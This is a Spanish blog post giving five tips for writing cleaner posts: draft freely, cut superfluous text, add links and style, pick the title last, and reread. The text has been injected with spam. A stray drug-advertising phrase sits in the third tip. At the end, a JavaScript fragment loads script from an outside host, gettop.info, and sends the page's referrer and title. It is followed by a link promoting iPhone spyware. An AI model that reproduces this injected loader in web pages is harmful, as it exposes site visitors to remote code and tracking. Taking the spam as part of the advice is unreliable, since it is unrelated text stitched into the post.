5 Consejos para mejorar nuestros posts

Muchos de los consejos que se suelen difundir acerca de los blogs y demás hablan sobre la importancia de un contenido original, sin embargo esto no importa si parece que fue improvisado por un niño de 8 años.

Yo puedo saber muy bien si el autor de un blog es una persona adulta pero si ese blog está plagado de errores ortográficos, fragmentos de oraciones, pensamientos incompletos, errores gramaticales y varios otros, no puedo dejar de imaginar a un niño pequeño sentado detrás del teclado pulsando las teclas.

Un contenido claro y bien escrito permite a los lectores comprenderlos con facilidad y ayuda a establecer tu credibilidad. Incluso si tú escribes un blog muy casual, es posible presentarlo de manera inteligente.

Aquí os vamos a dar 5 consejos para mejorar vuestro contenido.

1.- Escribe tu entrada de blog

No te preocupes por el flujo, la ortografía, gramática, enlaces, estilo de texto, o cualquier otra cosa solo plasma tus pensamientos e ideas. Recuerda que esto es un primer borrador.

  • Desarrolla el contenido en un medio que te sientas cómodo, a mí por ejemplo me gusta escribir las entradas de mi blog a la antigua usanza, a papel y bolígrafo, antes de añadirlo a un entorno en línea.

2.- Vuelve a leer tu entrada y quita pedazos

  • Reorganiza el contenido hasta que fluya suavemente.
  • Quita la información superflua.
  • Evita la repetición.
  • Se breve (es decir no utilices 20 palabras si con 10 es suficiente).

3.- Vuelve a leer y añade enlaces y estilo

  • Al añadir tus enlaces evita el uso de “clic aquí”, “leer esto” o cualquier tipo de frases ambiguas. El enlace debe incrustarse en el contenido como si fuera parte del diseño general.
  • synthroid mexico

  • Si ves necesario leer una frase más de una vez, vuelve a escribirla.
  • Utiliza la revisión ortográfica con precaución ya que habitualmente escribimos algunas palabras mal.

4.- Elige un título

La elección de un título antes de comenzar la entrada de blog puede establecer un límite mental sobre lo que escribir y producir un bloqueo del escritor.

  • El título debería ser un breve resumen de todo el artículo (lo ideal son 6/8 palabras), por eso es importante esperar a que la entrada esté terminada para obtener una visión más completa del texto.
  • Revisa los posibles errores ortográficos del título.

5.- Vuelve a leerlo de nuevo

Sí, otra vez, esto puede parecer que es por fastidiar, pero inconscientemente puedes estar pasando por alto algunos errores, aún incluso cuando estabas prestando atención en la revisión de las dos primeras veces.

  • Lee desde la última hasta la primera frase, es una manera de obtener una perspectiva diferente del texto. Si la entrada todavía fluye bien y tiene sentido, entonces la entrada estará lista.
  • Si no confías en tus habilidades de lectura a la hora de corregir errores, obtén la ayuda de otra persona que ponga su punto de vista.

Una vez finalizado no tengas miedo de editar una entrada si descubres errores. Si estás preocupado por tu reputación, agrega una nota a pie de entrada en la que pongas la hora y fecha de la edición de la entrada así como la que se ha editado.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »; http://hipnoterapeutamanuelbarbosa.com/iphone-spyware-app-android-spy-spyware-for-iphone-without-jailbreaking/